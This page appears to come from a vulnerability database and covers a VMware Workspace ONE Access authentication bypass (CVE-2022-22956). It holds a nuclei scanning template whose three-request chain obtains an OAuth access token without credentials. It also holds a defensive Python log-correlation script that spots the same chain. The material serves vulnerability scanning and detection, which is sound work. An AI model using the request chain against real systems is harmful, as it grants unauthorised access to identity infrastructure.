VMware Workspace ONE Access (formerly VMware Identity Manager) has two authentication bypass vulnerabilities (CVE-2022-22955 and CVE-2022-22956) in the OAuth2 ACS framework, both addressed in VMSA-2022-0011. A malicious actor may bypass the authentication mechanism and execute any operation because endpoints of the authentication framework are reachable without authentication. The check below chains three requests: an unauthenticated POST to the generateActivationToken endpoint returns an activation token, POSTing that token to the activate endpoint returns a client_id and client_secret, and a client_credentials grant against /SAAS/auth/oauthtoken then yields an access token. A host that answers all three with HTTP 200 JSON is vulnerable; a patched host rejects the first request.
PoC code [public]
id: CVE-2022-22956

info:
  name: VMware Workspace ONE Access - Authentication Bypass
  author: daffainfo
  severity: critical
  description: |
    VMware Workspace ONE Access has two authentication bypass vulnerabilities (CVE-2022-22955 & CVE-2022-22956) in the OAuth2 ACS framework. A malicious actor may bypass the authentication mechanism and execute any operation due to exposed endpoints in the authentication framework.
  impact: |
    Attackers can bypass authentication and perform unauthorized operations, potentially leading to full system compromise.
  remediation: |
    Apply the latest security patches provided by VMware to address these vulnerabilities.
  reference:
    - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/vmware_workspace_one_access_vmsa_2022_0011_chain.rb
    - https://srcincite.io/blog/2022/08/11/i-am-whoever-i-say-i-am-infiltrating-vmware-workspace-one-access-using-a-0-click-exploit.html
    - https://nvd.nist.gov/vuln/detail/CVE-2022-22956
    - http://packetstormsecurity.com/files/171918/Mware-Workspace-ONE-Remote-Code-Execution.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-22956
    cwe-id: CWE-287
    epss-score: 0.79786
    epss-percentile: 0.99043
    cpe: cpe:2.3:a:vmware:identity_manager:3.3.3:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: vmware
    product: identity_manager
    shodan-query: http.favicon.hash:"-1250474341"
    fofa-query: icon_hash=-1250474341
  tags: cve,cve2022,vmware,workspace,auth-bypass,vkev,vuln

# All three requests must succeed, in order; each stage feeds the next via internal extractors.
flow: http(1) && http(2) && http(3)

http:
  # Stage 1: unauthenticated request for an OAuth2 client activation token.
  - raw:
      - |
        POST /SAAS/API/1.0/REST/oauth2/generateActivationToken/Service__OAuth2Client HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 0

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "activationToken", "_links")'
          - 'contains(header, "application/json")'
          - 'status_code == 200'
        condition: and
        internal: true

    extractors:
      - type: json
        name: activation_token
        json:
          - '.activationToken'
        internal: true

  # Stage 2: activate the token; the raw token is the request body, so the blank line before it is required.
  - raw:
      - |
        POST /SAAS/API/1.0/REST/oauth2/activate HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        {{activation_token}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "client_id", "client_secret")'
          - 'contains(header, "application/json")'
          - 'status_code == 200'
        condition: and
        internal: true

    extractors:
      - type: json
        name: client_id
        json:
          - '.client_id'
        internal: true

      - type: json
        name: client_secret
        json:
          - '.client_secret'
        internal: true

  # Stage 3: exchange the newly minted client credentials for an access token.
  - raw:
      - |
        POST /SAAS/auth/oauthtoken HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        grant_type=client_credentials&client_id={{client_id}}&client_secret={{client_secret}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "access_token", "token_type")'
          - 'contains(header, "application/json")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a0047304502204c8a095c3d703ca0fa5a34c3a50900db70f31124c19a3e99430012d511a74385022100de789ce9c268f81910f6dbe8c116acb4b0128a8eca0dd7a642a069d6e7658646:922c64590222798bb761d5b6d8e72950
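The three endpoints above also give a defender something to look for after the fact. The following is an added example, not part of the nuclei template or of the original page: it correlates web-server access-log lines and flags a source that hits generateActivationToken, then activate, then /SAAS/auth/oauthtoken, all with HTTP 200, inside a short window. The log lines are constructed in Apache combined format for illustration; the real log format and file location on a Workspace ONE Access appliance are an assumption and must be confirmed on the system before this is pointed at production logs.

```python
"""Spot the CVE-2022-22956 request chain in access logs (added example, not the page's own code)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# The three endpoints the nuclei template POSTs to, in chain order.
STAGES = (
    ("generate", re.compile(r"^/SAAS/API/1\.0/REST/oauth2/generateActivationToken/")),
    ("activate", re.compile(r"^/SAAS/API/1\.0/REST/oauth2/activate$")),
    ("token", re.compile(r"^/SAAS/auth/oauthtoken$")),
)

# Apache/Tomcat combined-format access log; assumed format, verify against the appliance.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample: one full chain, one legitimate token request, one rejected attempt.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Apr/2023:12:00:01 +0000] "POST /SAAS/API/1.0/REST/oauth2/generateActivationToken/Service__OAuth2Client HTTP/1.1" 200 412 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Apr/2023:12:00:02 +0000] "POST /SAAS/API/1.0/REST/oauth2/activate HTTP/1.1" 200 233 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Apr/2023:12:00:03 +0000] "POST /SAAS/auth/oauthtoken HTTP/1.1" 200 1188 "-" "Mozilla/5.0"
198.51.100.5 - - [10/Apr/2023:12:05:00 +0000] "GET /SAAS/auth/login HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.5 - - [10/Apr/2023:12:05:10 +0000] "POST /SAAS/auth/oauthtoken HTTP/1.1" 200 1188 "-" "Mozilla/5.0"
192.0.2.9 - - [10/Apr/2023:12:10:00 +0000] "POST /SAAS/API/1.0/REST/oauth2/generateActivationToken/Service__OAuth2Client HTTP/1.1" 401 0 "-" "curl/8.0"
"""


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    path = m["path"].split("?", 1)[0]  # drop any query string before matching
    return {"ip": m["ip"], "ts": ts, "method": m["method"], "path": path, "status": int(m["status"])}


def classify(entry):
    """Name the chain stage a successful POST belongs to, or None if it is unrelated."""
    if entry["method"] != "POST" or entry["status"] != 200:
        return None
    for name, pattern in STAGES:
        if pattern.match(entry["path"]):
            return name
    return None


def find_chains(lines, window=timedelta(minutes=5)):
    """Return {ip: [start_time, ...]} for every generate -> activate -> token sequence
    completed by one source IP within `window` of the generate request."""
    per_ip = defaultdict(list)
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        stage = classify(entry)
        if stage:
            per_ip[entry["ip"]].append((entry["ts"], stage))

    hits = {}
    for ip, events in per_ip.items():
        events.sort()
        for i, (t0, stage) in enumerate(events):
            if stage != "generate":
                continue
            remaining = ["activate", "token"]  # must appear in this order after generate
            for t, later in events[i + 1:]:
                if t - t0 > window:
                    break
                if later == remaining[0]:
                    remaining.pop(0)
                    if not remaining:
                        hits.setdefault(ip, []).append(t0)
                        break
    return hits


if __name__ == "__main__":
    for ip, starts in find_chains(SAMPLE_LOG.splitlines()).items():
        for t0 in starts:
            print(f"possible CVE-2022-22956 chain from {ip} starting {t0.isoformat()}")
```

Two caveats when running this on real logs. The admin console legitimately calls generateActivationToken when an administrator creates an OAuth2 client, and the resulting token is normally activated by the client itself, often from a different address; so a single generate request is not evidence by itself, and the signal here is all three stages from one source in quick succession. Access logs also do not show whether the generate request carried a valid session, which is the actual bypass condition; on a patched appliance that request returns an error status, which is why the example only counts stages with HTTP 200.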